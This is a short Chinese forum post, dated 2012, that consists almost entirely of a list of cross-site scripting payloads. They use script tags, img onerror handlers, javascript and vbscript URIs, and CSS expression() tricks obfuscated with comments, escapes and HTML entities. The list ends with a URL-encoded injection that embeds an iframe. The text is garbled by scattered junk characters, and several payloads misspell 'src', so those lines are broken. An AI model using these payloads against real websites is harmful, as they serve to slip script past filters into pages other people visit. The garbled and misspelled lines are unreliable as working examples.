<script>alert("跨站")</script> (最常用): F3 s2 Y4 ~; |/ [
<img scr=javascript:alert("跨站")></img>
' v9 v" ?7 [3 @7 F* j<img scr="javascript: alert(/跨站/)></img>- J' a5 }0 T& s
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格): P1 F7 C( o5 g5 o8 h
<img scr="#" onerror=alert(/跨站/)></img>( F: G# L8 Q" i
<img scr="#" style="xss:expression(alert(/xss/));"></img>7 |+ r/ F' E- {: n5 H
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)' o% u, R/ N6 I
<img src=vbscript:msgbox ("xss")></img>
$ l# \, k7 T1 ?: U) x<style> input {left:expression (alert('xss'))}</style>
3 b* ~( B3 \' d7 U) a( `<div style={left:expression (alert('xss'))}></div>9 K2 B4 H+ B+ W! j$ _3 r! |
<div style={left:exp/* */ression (alert('xss'))}></div>
, A/ n# g, l* U<div style={left:\0065\0078ression (alert('xss'))}></div>+ |8 w% f) |8 f. u
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>& r( ]& m1 E6 U3 H2 m
unicode <div style="{left:expRessioN (alert('xss'))}">
3 Y7 u/ K( s" k
: v. N, e& [: \& B"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["+ Y9 X6 {7 y6 E7 u- ?
|
发表于 2012-9-13 17:15:04
收藏
支持
反对